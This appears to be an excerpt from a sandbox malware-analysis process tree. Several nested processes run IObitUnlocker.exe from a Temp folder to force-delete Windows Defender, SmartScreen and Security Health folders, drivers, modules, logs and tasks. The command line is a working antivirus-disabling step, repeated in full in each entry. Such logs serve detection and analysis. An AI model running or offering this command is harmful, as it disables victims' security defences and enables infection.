                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9344
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10720
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:10232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
